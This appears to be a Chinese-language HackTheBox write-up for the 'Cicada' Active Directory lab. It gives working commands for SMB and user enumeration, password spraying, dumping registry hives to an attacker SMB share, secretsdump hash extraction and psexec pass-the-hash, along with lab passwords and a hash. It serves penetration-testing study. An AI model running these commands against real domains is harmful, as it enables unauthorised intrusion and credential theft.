HackTheBox Writeup - Cicada

發布日期:2024/10/6

摘要: 一個簡單的 AD 靶機,只需要熟悉 AD 的偵查與 NTLM Hash 的破解及應用,就能輕易解題。


主機偵查

端口掃描

利用 nmap 對目標主機進行掃描,得知目標主機的作業系統是 Windows 而且開啟了 Kerberos 服務、DNS 服務與 LDAP 服務等,判斷其為網域控制器。

nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/HTB/Cicada/results/cicada.htb/scans/_quick_tcp_nmap.txt -oX /home/kali/HTB/Cicada/results/cicada.htb/scans/xml/_quick_tcp_nmap.xml cicada.htb

image

SMB 服務偵查

透過 SMBMap 掃描目標主機的網路磁碟。

smbmap -u "guest" -p "" -P 445 -H cicada.htb

image

其中, //cicada.htb/HR 中有一個文字檔,顯示預設密碼為 Cicada$M6Corpb*@Lp#nZp!8

image

以訪客身份利用 netexec 近一步列舉所有使用者。

netexec smb 10.129.23.230 -u guest -p '' --rid-brute > users.txt

image

從中擷取有效的使用者清單。

cat users.txt | grep SidTypeUser | cut -d \\ -f 2 | cut -d ' ' -f 1 > valid_users.txt

image

初始存取權

透過密碼噴灑攻擊,來確認哪個使用者使用了預設密碼。

crackmapexec smb cicada.htb --port=445 -u "/home/kali/HTB/Cicada/valid_users.txt" -p "/home/kali/HTB/Cicada/password.txt"

image

此使用者可以存取 //cicada.htb/DEV ,登入後發現一個備份用的腳本。

image

腳本內容記有 emily.oscars 的明文密碼。

image

提升權限

AD 偵查

透過 bloodhound 列舉得知, emily.oscars 屬於 Backup Operator 群組,擁有任意存取目標系統檔案和註冊表的權限。

image

密碼破解

開啟一個 smb 伺服器,利用 emily.oscars 的權限將目標系統的 SAM Hive 全部備份回 smb 伺服器。

impacket-smbserver share . -smb2support
impacket-reg 'cicada.htb/emily.oscars':'Q!3@Lp#M6b*7t*Vt'@10.129.23.230 backup -o '\\10.10.16.5\share'

image

利用 secretsdump.py 離線解析 SAM Hive ,可以獲得所有使用者的 NTLM Hash。

impacket-secretsdump LOCAL -system SYSTEM.save -security SECURITY.save -sam SAM.save

image

Pass-The-Hash

利用 psexec.py 進行 Pass-The-Hash 登入 Administrator 成功獲得 flag 。

impacket-psexec cicada.htb/administrator@10.129.23.230 -hashes aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341

image

目錄